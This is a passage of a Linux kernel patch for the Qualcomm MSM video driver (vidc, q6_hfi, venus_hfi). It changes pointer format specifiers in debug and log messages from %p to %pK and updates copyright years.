- }
- if (IS_SESSION_CMD_VALID(cmd)) {
-@@ -628,7 +628,7 @@ static int wait_for_state(struct msm_vidc_inst *inst,
- {
- int rc = 0;
- if (IS_ALREADY_IN_STATE(flipped_state, desired_state)) {
-- dprintk(VIDC_INFO, "inst: %p is already in state: %d\n",
-+ dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n",
- inst, inst->state);
- goto err_same_state;
- }
-@@ -689,7 +689,7 @@ static void handle_session_init_done(enum 
command_response cmd, void *data)
- inst = response->session_id;
- if (!inst || !inst->core || !inst->core->device) {
- dprintk(VIDC_ERR,
-- "%s: invalid parameters, inst %p\n", __func__, inst);
-+ "%s: invalid parameters, inst %pK\n", __func__, inst);
- return;
- }
- core = inst->core;
-@@ -813,7 +813,7 @@ static void handle_event_change(enum command_response cmd, void *data)
- struct buffer_info *binfo = NULL, *temp = NULL;
- u32 *ptr = NULL;
-
-- dprintk(VIDC_DBG, "%s - inst: %p buffer: 0x%pa extra: 0x%pa\n",
-+ dprintk(VIDC_DBG, "%s - inst: %pK buffer: 0x%pa extra: 0x%pa\n",
- __func__, inst, &event_notify->packet_buffer,
- &event_notify->extra_data_buffer);
-
-@@ -1149,7 +1149,7 @@ static void handle_sys_idle(enum command_response cmd, void *data)
- goto exit;
- }
-
-- dprintk(VIDC_DBG, "SYS_IDLE received for core %p\n", core);
-+ dprintk(VIDC_DBG, "SYS_IDLE received for core %pK\n", core);
- if (core->resources.dynamic_bw_update) {
- mutex_lock(&core->lock);
- core->idle_stats.start_time = ktime_get();
-@@ -1182,23 +1182,23 @@ static void handle_session_error(enum command_response cmd, void *data)
-
- if (!inst || !inst->session || !inst->core->device) {
- dprintk(VIDC_ERR,
-- "Session (%p) not in a stable enough state to handle session error\n",
-+ "Session (%pK) not in a stable enough state to handle session error\n",
- inst);
- return;
- }
-
- hdev = inst->core->device;
-- dprintk(VIDC_WARN, "Session error received for session %p\n", inst);
-+ dprintk(VIDC_WARN, "Session error received for session %pK\n", inst);
- change_inst_state(inst, MSM_VIDC_CORE_INVALID);
-
- if (response->status == VIDC_ERR_MAX_CLIENTS) {
-- dprintk(VIDC_WARN, "Too many clients, rejecting %p", inst);
-+ dprintk(VIDC_WARN, "Too many clients, rejecting %pK", inst);
- event = V4L2_EVENT_MSM_VIDC_MAX_CLIENTS;
- } else if (response->status == VIDC_ERR_NOT_SUPPORTED) {
-- dprintk(VIDC_WARN, "Unsupported error for %p", inst);
-+ dprintk(VIDC_WARN, "Unsupported error for %pK", inst);
- 
event = V4L2_EVENT_MSM_VIDC_HW_UNSUPPORTED;
- } else {
-- dprintk(VIDC_WARN, "Unknown session error (%d) for %p\n",
-+ dprintk(VIDC_WARN, "Unknown session error (%d) for %pK\n",
- response->status, inst);
- event = V4L2_EVENT_MSM_VIDC_SYS_ERROR;
- }
-@@ -1213,7 +1213,7 @@ static void msm_comm_clean_notify_client(struct msm_vidc_core *core)
- return;
- }
-
-- dprintk(VIDC_WARN, "%s: Core %p\n", __func__, core);
-+ dprintk(VIDC_WARN, "%s: Core %pK\n", __func__, core);
- mutex_lock(&core->lock);
- core->state = VIDC_CORE_INVALID;
-
-@@ -1222,7 +1222,7 @@ static void msm_comm_clean_notify_client(struct msm_vidc_core *core)
- inst->state = MSM_VIDC_CORE_INVALID;
- mutex_unlock(&inst->lock);
- dprintk(VIDC_WARN,
-- "%s Send sys error for inst %p\n", __func__, inst);
-+ "%s Send sys error for inst %pK\n", __func__, inst);
- msm_vidc_queue_v4l2_event(inst,
- V4L2_EVENT_MSM_VIDC_SYS_ERROR);
- }
-@@ -1255,7 +1255,7 @@ static void handle_sys_error(enum command_response cmd, void *data)
- return;
- }
-
-- dprintk(VIDC_WARN, "SYS_ERROR %d received for core %p\n", cmd, core);
-+ dprintk(VIDC_WARN, "SYS_ERROR %d received for core %pK\n", cmd, core);
- msm_comm_clean_notify_client(core);
- hdev = core->device;
- mutex_lock(&core->lock);
-@@ -1290,12 +1290,12 @@ void msm_comm_session_clean(struct msm_vidc_inst *inst)
-
- hdev = inst->core->device;
- if (hdev && inst->session) {
-- dprintk(VIDC_DBG, "cleaning up instance: 0x%p\n", inst);
-+ dprintk(VIDC_DBG, "cleaning up instance: 0x%pK\n", inst);
- rc = call_hfi_op(hdev, session_clean,
- (void *) inst->session);
- if (rc) {
- dprintk(VIDC_ERR,
-- "Session clean failed :%p\n", inst);
-+ "Session clean failed :%pK\n", inst);
- }
- inst->session = NULL;
- }
-@@ -1696,7 +1696,7 @@ static void handle_fbd(enum command_response cmd, void *data)
-
- if (extra_idx && (extra_idx < VIDEO_MAX_PLANES)) {
- dprintk(VIDC_DBG,
-- "extradata: userptr = %p;"
-+ "extradata: userptr = %pK;"
- " bytesused = %d; length = %d\n",
- (u8 
*)vb->v4l2_planes[extra_idx].m.userptr,
- vb->v4l2_planes[extra_idx].bytesused,
-@@ -1838,13 +1838,13 @@ int msm_comm_scale_clocks_load(struct msm_vidc_core *core, int num_mbs_per_sec)
- int codec = 0;
-
- if (!core) {
-- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, core);
-+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, core);
- return -EINVAL;
- }
-
- hdev = core->device;
- if (!hdev) {
-- dprintk(VIDC_ERR, "%s Invalid device handle: %p\n",
-+ dprintk(VIDC_ERR, "%s Invalid device handle: %pK\n",
- __func__, hdev);
- return -EINVAL;
- }
-@@ -1996,7 +1996,7 @@ static int msm_comm_session_abort(struct msm_vidc_inst *inst)
- msecs_to_jiffies(msm_vidc_hw_rsp_timeout));
- if (!rc) {
- dprintk(VIDC_ERR,
-- "%s: Wait interrupted or timed out [%p]: %d\n",
-+ "%s: Wait interrupted or timed out [%pK]: %d\n",
- __func__, inst, abort_completion);
- rc = -EBUSY;
- } else {
-@@ -2023,7 +2023,7 @@ static void handle_thermal_event(struct msm_vidc_core *core)
- mutex_unlock(&core->lock);
- if (inst->state >= MSM_VIDC_OPEN_DONE &&
- inst->state < MSM_VIDC_CLOSE_DONE) {
-- dprintk(VIDC_WARN, "%s: abort inst %p\n",
-+ dprintk(VIDC_WARN, "%s: abort inst %pK\n",
- __func__, inst);
-
- change_inst_state(inst, MSM_VIDC_CORE_INVALID);
-@@ -2035,7 +2035,7 @@ static void handle_thermal_event(struct msm_vidc_core *core)
- goto err_sess_abort;
- }
- dprintk(VIDC_WARN,
-- "%s Send sys error for inst %p\n",
-+ "%s Send sys error for inst %pK\n",
- __func__, inst);
- msm_vidc_queue_v4l2_event(inst,
- V4L2_EVENT_MSM_VIDC_SYS_ERROR);
-@@ -2290,7 +2290,7 @@ static int msm_comm_session_init(int flipped_state,
- hdev = inst->core->device;
-
- if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_OPEN)) {
-- dprintk(VIDC_INFO, "inst: %p is already in state: %d\n",
-+ dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n",
- inst, inst->state);
- goto exit;
- }
-@@ -2311,7 +2311,7 @@ static int msm_comm_session_init(int flipped_state,
-
- if (!inst->session) {
- dprintk(VIDC_ERR,
-- "Failed 
to call session init for: %p, %p, %d, %d\n",
-+ "Failed to call session init for: %pK, %pK, %d, %d\n",
- inst->core->device, inst,
- inst->session_type, fourcc);
- rc = -EINVAL;
-@@ -2405,7 +2405,7 @@ static int msm_vidc_load_resources(int flipped_state,
-
- hdev = core->device;
- if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_LOAD_RESOURCES)) {
-- dprintk(VIDC_INFO, "inst: %p is already in state: %d\n",
-+ dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n",
- inst, inst->state);
- goto exit;
- }
-@@ -2441,7 +2441,7 @@ static int msm_vidc_start(int flipped_state, struct msm_vidc_inst *inst)
-
- if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_START)) {
- dprintk(VIDC_INFO,
-- "inst: %p is already in state: %d\n",
-+ "inst: %pK is already in state: %d\n",
- inst, inst->state);
- goto exit;
- }
-@@ -2471,7 +2471,7 @@ static int msm_vidc_stop(int flipped_state, struct msm_vidc_inst *inst)
-
- if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_STOP)) {
- dprintk(VIDC_INFO,
-- "inst: %p is already in state: %d\n",
-+ "inst: %pK is already in state: %d\n",
- inst, inst->state);
- goto exit;
- }
-@@ -2501,7 +2501,7 @@ static int msm_vidc_release_res(int flipped_state, struct msm_vidc_inst *inst)
-
- if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_RELEASE_RESOURCES)) {
- dprintk(VIDC_INFO,
-- "inst: %p is already in state: %d\n",
-+ "inst: %pK is already in state: %d\n",
- inst, inst->state);
- goto exit;
- }
-@@ -2533,7 +2533,7 @@ static int msm_comm_session_close(int flipped_state,
- hdev = inst->core->device;
- if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_CLOSE)) {
- dprintk(VIDC_INFO,
-- "inst: %p is already in state: %d\n",
-+ "inst: %pK is already in state: %d\n",
- inst, inst->state);
- goto exit;
- }
-@@ -2939,16 +2939,16 @@ int msm_comm_try_state(struct msm_vidc_inst *inst, int state)
- struct msm_vidc_core *core;
- if (!inst) {
- dprintk(VIDC_ERR,
-- "Invalid instance pointer = %p\n", inst);
-+ "Invalid instance pointer = %pK\n", inst);
- return -EINVAL;
- 
}
- dprintk(VIDC_DBG,
-- "Trying to move inst: %p from: 0x%x to 0x%x\n",
-+ "Trying to move inst: %pK from: 0x%x to 0x%x\n",
- inst, inst->state, state);
- core = inst->core;
- if (!core) {
- dprintk(VIDC_ERR,
-- "Invalid core pointer = %p\n", inst);
-+ "Invalid core pointer = %pK\n", inst);
- return -EINVAL;
- }
- mutex_lock(&inst->sync_lock);
-@@ -3117,7 +3117,7 @@ int msm_comm_qbuf(struct vb2_buffer *vb)
- int extra_idx = 0;
-
- if (!vb || !vb->vb2_queue) {
-- dprintk(VIDC_ERR, "%s: Invalid input: %p\n",
-+ dprintk(VIDC_ERR, "%s: Invalid input: %pK\n",
- __func__, vb);
- return -EINVAL;
- }
-@@ -3125,7 +3125,7 @@ int msm_comm_qbuf(struct vb2_buffer *vb)
- q = vb->vb2_queue;
- inst = q->drv_priv;
- if (!inst) {
-- dprintk(VIDC_ERR, "%s: Invalid input: %p\n",
-+ dprintk(VIDC_ERR, "%s: Invalid input: %pK\n",
- __func__, vb);
- return -EINVAL;
- }
-@@ -3133,12 +3133,12 @@ int msm_comm_qbuf(struct vb2_buffer *vb)
- core = inst->core;
- if (!core) {
- dprintk(VIDC_ERR,
-- "Invalid input: %p, %p, %p\n", inst, core, vb);
-+ "Invalid input: %pK, %pK, %pK\n", inst, core, vb);
- return -EINVAL;
- }
- hdev = core->device;
- if (!hdev) {
-- dprintk(VIDC_ERR, "%s: Invalid input: %p\n",
-+ dprintk(VIDC_ERR, "%s: Invalid input: %pK\n",
- __func__, hdev);
- return -EINVAL;
- }
-@@ -3292,7 +3292,7 @@ int msm_comm_qbuf(struct vb2_buffer *vb)
- (void *) inst->session, &seq_hdr);
- if (!rc) {
- inst->vb2_seq_hdr = vb;
-- dprintk(VIDC_DBG, "Seq_hdr: %p\n",
-+ dprintk(VIDC_DBG, "Seq_hdr: %pK\n",
- inst->vb2_seq_hdr);
- }
- atomic_dec(&inst->seq_hdr_reqs);
-@@ -3406,7 +3406,7 @@ int msm_comm_try_get_prop(struct msm_vidc_inst *inst, enum hal_property ptype,
- msecs_to_jiffies(msm_vidc_hw_rsp_timeout));
- if (!rc) {
- dprintk(VIDC_ERR,
-- "%s: Wait interrupted or timed out [%p]: %d\n",
-+ "%s: Wait interrupted or timed out [%pK]: %d\n",
- __func__, inst,
- SESSION_MSG_INDEX(SESSION_PROPERTY_INFO));
- inst->state = MSM_VIDC_CORE_INVALID;
-@@ -3444,18 +3444,18 @@ int 
msm_comm_release_output_buffers(struct msm_vidc_inst *inst)
- struct hfi_device *hdev;
- if (!inst) {
- dprintk(VIDC_ERR,
-- "Invalid instance pointer = %p\n", inst);
-+ "Invalid instance pointer = %pK\n", inst);
- return -EINVAL;
- }
- core = inst->core;
- if (!core) {
- dprintk(VIDC_ERR,
-- "Invalid core pointer = %p\n", core);
-+ "Invalid core pointer = %pK\n", core);
- return -EINVAL;
- }
- hdev = core->device;
- if (!hdev) {
-- dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+ dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- return -EINVAL;
- }
- mutex_lock(&inst->outputbufs.lock);
-@@ -3551,18 +3551,18 @@ int msm_comm_release_scratch_buffers(struct msm_vidc_inst *inst,
- enum hal_buffer sufficiency = HAL_BUFFER_NONE;
- if (!inst) {
- dprintk(VIDC_ERR,
-- "Invalid instance pointer = %p\n", inst);
-+ "Invalid instance pointer = %pK\n", inst);
- return -EINVAL;
- }
- core = inst->core;
- if (!core) {
- dprintk(VIDC_ERR,
-- "Invalid core pointer = %p\n", core);
-+ "Invalid core pointer = %pK\n", core);
- return -EINVAL;
- }
- hdev = core->device;
- if (!hdev) {
-- dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+ dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- return -EINVAL;
- }
-
-@@ -3639,18 +3639,18 @@ int msm_comm_release_persist_buffers(struct msm_vidc_inst *inst)
- struct hfi_device *hdev;
- if (!inst) {
- dprintk(VIDC_ERR,
-- "Invalid instance pointer = %p\n", inst);
-+ "Invalid instance pointer = %pK\n", inst);
- return -EINVAL;
- }
- core = inst->core;
- if (!core) {
- dprintk(VIDC_ERR,
-- "Invalid core pointer = %p\n", core);
-+ "Invalid core pointer = %pK\n", core);
- return -EINVAL;
- }
- hdev = core->device;
- if (!hdev) {
-- dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+ dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- return -EINVAL;
- }
-
-@@ -3699,7 +3699,7 @@ int msm_comm_try_set_prop(struct msm_vidc_inst *inst,
- int rc = 0;
- struct hfi_device *hdev;
- if (!inst) {
-- 
dprintk(VIDC_ERR, "Invalid input: %p\n", inst);
-+ dprintk(VIDC_ERR, "Invalid input: %pK\n", inst);
- return -EINVAL;
- }
-
-@@ -3913,7 +3913,7 @@ void msm_comm_flush_pending_dynamic_buffers(struct msm_vidc_inst *inst)
- list_for_each_entry(binfo, &inst->registeredbufs.list, list) {
- if (binfo->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) {
- dprintk(VIDC_DBG,
-- "%s: binfo = %p device_addr = 0x%pa\n",
-+ "%s: binfo = %pK device_addr = 0x%pa\n",
- __func__, binfo, &binfo->device_addr[0]);
- buf_ref_put(inst, binfo);
- }
-@@ -3933,18 +3933,18 @@ int msm_comm_flush(struct msm_vidc_inst *inst, u32 flags)
- struct hfi_device *hdev;
- if (!inst) {
- dprintk(VIDC_ERR,
-- "Invalid instance pointer = %p\n", inst);
-+ "Invalid instance pointer = %pK\n", inst);
- return -EINVAL;
- }
- core = inst->core;
- if (!core) {
- dprintk(VIDC_ERR,
-- "Invalid core pointer = %p\n", core);
-+ "Invalid core pointer = %pK\n", core);
- return -EINVAL;
- }
- hdev = core->device;
- if (!hdev) {
-- dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+ dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- return -EINVAL;
- }
-
-@@ -3961,7 +3961,7 @@ int msm_comm_flush(struct msm_vidc_inst *inst, u32 flags)
- core->state == VIDC_CORE_UNINIT ||
- core->state == VIDC_CORE_INVALID) {
- dprintk(VIDC_ERR,
-- "Core %p and inst %p are in bad state\n",
-+ "Core %pK and inst %pK are in bad state\n",
- core, inst);
- msm_comm_flush_in_invalid_state(inst);
- return 0;
-@@ -4153,7 +4153,7 @@ int msm_vidc_trigger_ssr(struct msm_vidc_core *core,
- int rc = 0;
- struct hfi_device *hdev;
- if (!core || !core->device) {
-- dprintk(VIDC_WARN, "Invalid parameters: %p\n", core);
-+ dprintk(VIDC_WARN, "Invalid parameters: %pK\n", core);
- return -EINVAL;
- }
- hdev = core->device;
-@@ -4389,7 +4389,7 @@ int msm_comm_kill_session(struct msm_vidc_inst *inst)
- change_inst_state(inst, MSM_VIDC_CLOSE_DONE);
- } else {
- dprintk(VIDC_WARN,
-- "Inactive session %p, triggering an internal session error\n", 
-+ "Inactive session %pK, triggering an internal session error\n",
- inst);
- msm_comm_generate_session_error(inst);
-
-@@ -4421,7 +4421,7 @@ struct msm_smem *msm_comm_smem_alloc(struct msm_vidc_inst *inst,
- struct msm_smem *m = NULL;
-
- if (!inst || !inst->core) {
-- dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst);
-+ dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst);
- return NULL;
- }
- mutex_lock(&inst->core->lock);
-@@ -4439,7 +4439,7 @@ void msm_comm_smem_free(struct msm_vidc_inst *inst, struct msm_smem *mem)
- {
- if (!inst || !inst->core || !mem) {
- dprintk(VIDC_ERR,
-- "%s: invalid params: %p %p\n", __func__, inst, mem);
-+ "%s: invalid params: %pK %pK\n", __func__, inst, mem);
- return;
- }
-
-@@ -4458,7 +4458,7 @@ int msm_comm_smem_cache_operations(struct msm_vidc_inst *inst,
- {
- if (!inst || !mem) {
- dprintk(VIDC_ERR,
-- "%s: invalid params: %p %p\n", __func__, inst, mem);
-+ "%s: invalid params: %pK %pK\n", __func__, inst, mem);
- return -EINVAL;
- }
- return msm_smem_cache_operations(inst->mem_client, mem, cache_ops);
-@@ -4470,7 +4470,7 @@ struct msm_smem *msm_comm_smem_user_to_kernel(struct msm_vidc_inst *inst,
- struct msm_smem *m = NULL;
-
- if (!inst || !inst->core) {
-- dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst);
-+ dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst);
- return NULL;
- }
-
-@@ -4496,7 +4496,7 @@ int msm_comm_smem_get_domain_partition(struct msm_vidc_inst *inst,
- int *domain_num, int *partition_num)
- {
- if (!inst || !domain_num || !partition_num) {
-- dprintk(VIDC_ERR, "%s: invalid params: %p %p %p\n",
-+ dprintk(VIDC_ERR, "%s: invalid params: %pK %pK %pK\n",
- __func__, inst, domain_num, partition_num);
- return -EINVAL;
- }
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c b/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c
-index 708b44a..231ec66 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c 
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014 - 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014 - 2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -40,7 +40,7 @@ static inline int msm_dcvs_count_active_instances(struct msm_vidc_core *core)
- struct msm_vidc_inst *inst = NULL;
-
- if (!core) {
-- dprintk(VIDC_ERR, "%s: Invalid args: %p\n", __func__, core);
-+ dprintk(VIDC_ERR, "%s: Invalid args: %pK\n", __func__, core);
- return -EINVAL;
- }
-
-@@ -116,7 +116,7 @@ static void msm_dcvs_dec_check_and_scale_clocks(struct msm_vidc_inst *inst)
- void msm_dcvs_check_and_scale_clocks(struct msm_vidc_inst *inst, bool is_etb)
- {
- if (!inst) {
-- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- return;
- }
-
-@@ -168,7 +168,7 @@ void msm_dcvs_init_load(struct msm_vidc_inst *inst)
- dprintk(VIDC_DBG, "Init DCVS Load\n");
-
- if (!inst || !inst->core) {
-- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- return;
- }
-
-@@ -217,7 +217,7 @@ void msm_dcvs_init(struct msm_vidc_inst *inst)
- dprintk(VIDC_DBG, "Init DCVS Struct\n");
-
- if (!inst) {
-- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- return;
- }
-
-@@ -234,7 +234,7 @@ void msm_dcvs_monitor_buffer(struct msm_vidc_inst *inst)
- struct hal_buffer_requirements *output_buf_req;
-
- if (!inst) {
-- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- return;
- }
- dcvs = &inst->dcvs;
-@@ -243,7 +243,7 @@ void msm_dcvs_monitor_buffer(struct msm_vidc_inst *inst)
- output_buf_req = get_buff_req_buffer(inst,
- msm_comm_get_hal_output_buffer(inst));
- if 
(!output_buf_req) {
-- dprintk(VIDC_ERR, "%s : Get output buffer req failed %p\n",
-+ dprintk(VIDC_ERR, "%s : Get output buffer req failed %pK\n",
- __func__, inst);
- mutex_unlock(&inst->lock);
- return;
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-index c422ed7..5cf5e81 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -76,13 +76,13 @@ static ssize_t core_info_read(struct file *file, char __user *buf,
- int i = 0, rc = 0;
-
- if (!core || !core->device) {
-- dprintk(VIDC_ERR, "Invalid params, core: %p\n", core);
-+ dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core);
- return 0;
- }
- hdev = core->device;
- INIT_DBG_BUF(dbg_buf);
- write_str(&dbg_buf, "===============================\n");
-- write_str(&dbg_buf, "CORE %d: 0x%p\n", core->id, core);
-+ write_str(&dbg_buf, "CORE %d: 0x%pK\n", core->id, core);
- write_str(&dbg_buf, "===============================\n");
- write_str(&dbg_buf, "Core state: %d\n", core->state);
- rc = call_hfi_op(hdev, get_fw_info, hdev->hfi_device_data, &fw_info);
-@@ -242,7 +242,7 @@ struct dentry *msm_vidc_debugfs_init_core(struct msm_vidc_core *core,
- struct dentry *dir = NULL;
- char debugfs_name[MAX_DEBUGFS_NAME];
- if (!core) {
-- dprintk(VIDC_ERR, "Invalid params, core: %p\n", core);
-+ dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core);
- goto failed_create_dir;
- }
-
-@@ -306,15 +306,15 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- struct msm_vidc_inst *inst = file->private_data;
- int i, j;
- if (!inst) {
-- dprintk(VIDC_ERR, "Invalid params, core: 
%p\n", inst);
-+ dprintk(VIDC_ERR, "Invalid params, core: %pK\n", inst);
- return 0;
- }
- INIT_DBG_BUF(dbg_buf);
- write_str(&dbg_buf, "===============================\n");
-- write_str(&dbg_buf, "INSTANCE: 0x%p (%s)\n", inst,
-+ write_str(&dbg_buf, "INSTANCE: 0x%pK (%s)\n", inst,
- inst->session_type == MSM_VIDC_ENCODER ? "Encoder" : "Decoder");
- write_str(&dbg_buf, "===============================\n");
-- write_str(&dbg_buf, "core: 0x%p\n", inst->core);
-+ write_str(&dbg_buf, "core: 0x%pK\n", inst->core);
- write_str(&dbg_buf, "height: %d\n", inst->prop.height[CAPTURE_PORT]);
- write_str(&dbg_buf, "width: %d\n", inst->prop.width[CAPTURE_PORT]);
- write_str(&dbg_buf, "fps: %d\n", inst->prop.fps);
-@@ -381,10 +381,10 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst,
- struct dentry *dir = NULL;
- char debugfs_name[MAX_DEBUGFS_NAME];
- if (!inst) {
-- dprintk(VIDC_ERR, "Invalid params, inst: %p\n", inst);
-+ dprintk(VIDC_ERR, "Invalid params, inst: %pK\n", inst);
- goto failed_create_dir;
- }
-- snprintf(debugfs_name, MAX_DEBUGFS_NAME, "inst_%p", inst);
-+ snprintf(debugfs_name, MAX_DEBUGFS_NAME, "inst_%pK", inst);
- dir = debugfs_create_dir(debugfs_name, parent);
- if (!dir) {
- dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n");
-diff --git a/drivers/media/platform/msm/vidc/q6_hfi.c b/drivers/media/platform/msm/vidc/q6_hfi.c
-index 10f4baa..31f6263 100644
---- a/drivers/media/platform/msm/vidc/q6_hfi.c
-+++ b/drivers/media/platform/msm/vidc/q6_hfi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved. 
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -202,7 +202,7 @@ static int q6_hfi_register_iommu_domains(struct q6_hfi_device *device)
- struct iommu_info *iommu_map;
-
- if (!device || !device->res) {
-- dprintk(VIDC_ERR, "Invalid parameter: %p\n", device);
-+ dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device);
- return -EINVAL;
- }
-
-@@ -220,7 +220,7 @@ static int q6_hfi_register_iommu_domains(struct q6_hfi_device *device)
- domain = iommu_group_get_iommudata(iommu_map->group);
- if (IS_ERR_OR_NULL(domain)) {
- dprintk(VIDC_ERR,
-- "Failed to get domain data for group %p\n",
-+ "Failed to get domain data for group %pK\n",
- iommu_map->group);
- rc = -EINVAL;
- goto fail_group;
-@@ -228,7 +228,7 @@ static int q6_hfi_register_iommu_domains(struct q6_hfi_device *device)
- iommu_map->domain = msm_find_domain_no(domain);
- if (iommu_map->domain < 0) {
- dprintk(VIDC_ERR,
-- "Failed to get domain index for domain %p\n",
-+ "Failed to get domain index for domain %pK\n",
- domain);
- rc = -EINVAL;
- goto fail_group;
-@@ -254,7 +254,7 @@ static void q6_hfi_deregister_iommu_domains(struct q6_hfi_device *device)
- int i = 0;
-
- if (!device || !device->res) {
-- dprintk(VIDC_ERR, "Invalid parameter: %p\n", device);
-+ dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device);
- return;
- }
-
-@@ -347,7 +347,7 @@ static void *q6_hfi_get_device(u32 device_id,
- int rc = 0;
-
- if (!callback) {
-- dprintk(VIDC_ERR, "%s Invalid params: %p\n",
-+ dprintk(VIDC_ERR, "%s Invalid params: %pK\n",
- __func__, callback);
- return NULL;
- }
-@@ -663,7 +663,7 @@ static int q6_hfi_session_clean(void *session)
- return -EINVAL;
- }
- sess_close = session;
-- dprintk(VIDC_DBG, "deleted the session: 0x%p\n",
-+ dprintk(VIDC_DBG, "deleted the session: 0x%pK\n",
- sess_close->session_id);
- mutex_lock(&((struct q6_hfi_device *)
- sess_close->device)->session_lock);
-@@ -1207,7 +1207,7 @@ 
static int q6_hfi_iommu_attach(struct q6_hfi_device *device) - struct iommu_info *iommu_map; - - if (!device || !device->res) { -- dprintk(VIDC_ERR, "Invalid parameter: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device); - return -EINVAL; - } - -@@ -1222,7 +1222,7 @@ static int q6_hfi_iommu_attach(struct q6_hfi_device *device) - rc = PTR_ERR(domain) ?: -EINVAL; - break; - } -- dprintk(VIDC_DBG, "Attaching domain(id:%d) %p to group %p\n", -+ dprintk(VIDC_DBG, "Attaching domain(id:%d) %pK to group %pK\n", - iommu_map->domain, domain, group); - rc = iommu_attach_group(domain, group); - if (rc) { -@@ -1253,7 +1253,7 @@ static void q6_hfi_iommu_detach(struct q6_hfi_device *device) - int i; - - if (!device || !device->res) { -- dprintk(VIDC_ERR, "Invalid parameter: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device); - return; - } - -@@ -1382,7 +1382,7 @@ int q6_hfi_initialize(struct hfi_device *hdev, u32 device_id, - int rc = 0; - - if (!hdev || !res || !callback) { -- dprintk(VIDC_ERR, "Invalid params: %p %p %p\n", -+ dprintk(VIDC_ERR, "Invalid params: %pK %pK %pK\n", - hdev, res, callback); - rc = -EINVAL; - goto err_hfi_init; -diff --git a/drivers/media/platform/msm/vidc/venus_hfi.c b/drivers/media/platform/msm/vidc/venus_hfi.c -index 76ad1bc..0015c84 100644 ---- a/drivers/media/platform/msm/vidc/venus_hfi.c -+++ b/drivers/media/platform/msm/vidc/venus_hfi.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -370,7 +370,7 @@ static int venus_hfi_write_queue(void *info, u8 *packet, u32 *rx_req_is_set) - } - - if (msm_vidc_debug & VIDC_PKT) { -- dprintk(VIDC_PKT, "%s: %p\n", __func__, qinfo); -+ dprintk(VIDC_PKT, "%s: %pK\n", __func__, qinfo); - venus_hfi_dump_packet(packet); - } - -@@ -580,7 +580,7 @@ static int venus_hfi_read_queue(void *info, u8 *packet, u32 *pb_tx_req_is_set) - - if ((msm_vidc_debug & VIDC_PKT) && - (queue->qhdr_type & HFI_Q_ID_CTRL_TO_HOST_MSG_Q)) { -- dprintk(VIDC_PKT, "%s: %p\n", __func__, qinfo); -+ dprintk(VIDC_PKT, "%s: %pK\n", __func__, qinfo); - venus_hfi_dump_packet(packet); - } - -@@ -611,7 +611,7 @@ static int venus_hfi_alloc(struct venus_hfi_device *dev, void *mem, - rc = 